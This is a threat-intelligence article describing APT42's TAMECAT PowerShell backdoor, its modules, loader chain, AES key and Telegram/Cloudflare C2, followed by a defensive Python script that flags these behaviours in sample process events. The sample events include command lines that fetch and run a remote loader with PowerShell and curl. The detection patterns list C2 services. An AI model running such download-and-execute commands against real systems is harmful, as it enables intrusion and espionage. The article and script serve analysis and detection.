A sophisticated espionage campaign targeting senior defense and government officials has been linked to APT42, an Iranian state-sponsored actor associated with the Islamic Revolutionary Guard Corps (IRGC). At the heart of this campaign is TAMECAT, a complex, modular PowerShell backdoor designed to steal sensitive data while evading detection.
New analysis from Pulsedive Threat Research, citing findings from the Israel National Digital Agency, sheds light on the inner workings of this “fileless” threat.
Unlike “smash and grab” cyberattacks, APT42 operates with patience. The group leverages detailed social engineering to cultivate relationships with their targets—often posing as trusted contacts on platforms like WhatsApp—before striking.
“The group leverages social engineering to build rapport with victims over an extended period before gaining access to their environments.” — Pulsedive Threat Research / Israel National Digital Agency
This human-centric approach allows them to bypass traditional perimeter defenses by convincing high-value targets to open malicious links voluntarily.
Once inside, the attackers deploy TAMECAT, a PowerShell-based malware framework that resides primarily in memory. The analysis reveals a toolset built specifically for intelligence gathering.
“Israel’s National Digital Agency shared a breakdown of the in-memory modules available with TAMECAT. This included the ability to extract data from Microsoft Edge using remote debugging, screen captures, and suspending Chrome for data collection.” — Pulsedive Threat Research

The malware’s capabilities are vast and modular, allowing operators to push specific functionality as needed. Key modules identified include:
- Browser Module: Extracts cookies and history from Chrome, Edge, and Firefox.
- Screen Module: Captures screenshots of the victim’s desktop.
- FileCrawler Module: Scans the filesystem for documents of interest.
The infection chain begins with a VBScript file that performs a “health check” on the victim’s machine. It scans for installed antivirus products to decide how to proceed—using conhost to launch PowerShell if Windows Defender is present, or curl if it is not.
The loader, identified as nconf.txt (hosted on tebi.io), uses heavy obfuscation and encryption to hide its purpose. It employs custom functions with names like Gorba, Borjol, and Borpos to handle AES encryption and data manipulation.
- AES Encryption: The malware uses a hardcoded 256-bit AES key (kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B) to secure its configuration and exfiltrated data.
- C2 Infrastructure: TAMECAT communicates with its controllers using a variety of channels to blend in with legitimate traffic, including Cloudflare Workers, Discord, Telegram, and WebDAV servers.
One of the most notable features of TAMECAT is its integration with Telegram for command and control (C2). The malware listens for specific keywords from a Telegram bot to trigger actions:
- Invest: Likely related to downloading payloads.
- Scene&Look: Commands associated with specific worker domains.
- #Journey: Used to set the decryption key.
“Reporting from Israel indicates that TAMECAT was observed being deployed in espionage campaigns targeting high-value senior defense and government officials.” — Pulsedive Threat Research
APT42’s use of TAMECAT demonstrates a shift toward modular, in-memory malware that is harder to detect and easier to update. For defenders, this underscores the importance of monitoring PowerShell activity and scrutinizing traffic to trusted services like Telegram and Cloudflare.
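As an added example (not code from the Pulsedive or Israel National Digital Agency reporting), the triage logic below runs over constructed Sysmon-style process-creation events and flags the loader behaviour the article describes: a VBScript host launching PowerShell through conhost or fetching with curl, PowerShell reaching the Telegram, Cloudflare Workers or tebi.io services named above, and Edge started with remote debugging. Event field names, hostnames and command lines are assumptions for illustration.

```python
"""Triage Windows process-creation events for the TAMECAT loader patterns
described in the article. Sample events are constructed, not real telemetry."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # VBScript launchers
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Services the article names as C2 or hosting channels; patterns are illustrative.
SUSPECT_HOSTS = re.compile(r"api\.telegram\.org|\.workers\.dev|tebi\.io", re.I)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the names of the rules an event matches (empty list if none)."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"].lower()
    hits = []
    # Defender-present branch: script host -> conhost -> PowerShell
    if parent in SCRIPT_HOSTS and image == "conhost.exe" and "powershell" in cmd:
        hits.append("vbs_conhost_powershell")
    if parent == "conhost.exe" and image in POWERSHELL:   # conhost is normally a child, not a parent
        hits.append("conhost_parent_powershell")
    # Defender-absent branch: script host -> curl
    if parent in SCRIPT_HOSTS and image == "curl.exe":
        hits.append("vbs_curl_download")
    # Any PowerShell talking to the article's C2 / hosting services
    if image in POWERSHELL and SUSPECT_HOSTS.search(cmd):
        hits.append("powershell_suspect_channel")
    # Edge launched with remote debugging, as used by the browser module
    if image == "msedge.exe" and "--remote-debugging-port" in cmd:
        hits.append("edge_remote_debugging")
    return hits

def triage(events: list) -> dict:
    """Map event index -> matched rules, keeping only events that fired."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 style records
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe powershell.exe -NoP -W Hidden -c <encoded>"},
    {"ParentImage": r"C:\Windows\System32\conhost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -c (irm https://<bucket>.tebi.io/nconf.txt)"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s -o nconf.txt https://<bucket>.tebi.io/nconf.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},   # benign baseline
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules)
```

The benign fourth event shows the rules stay quiet for ordinary interactive PowerShell; tune SUSPECT_HOSTS to your own allow-list before deploying.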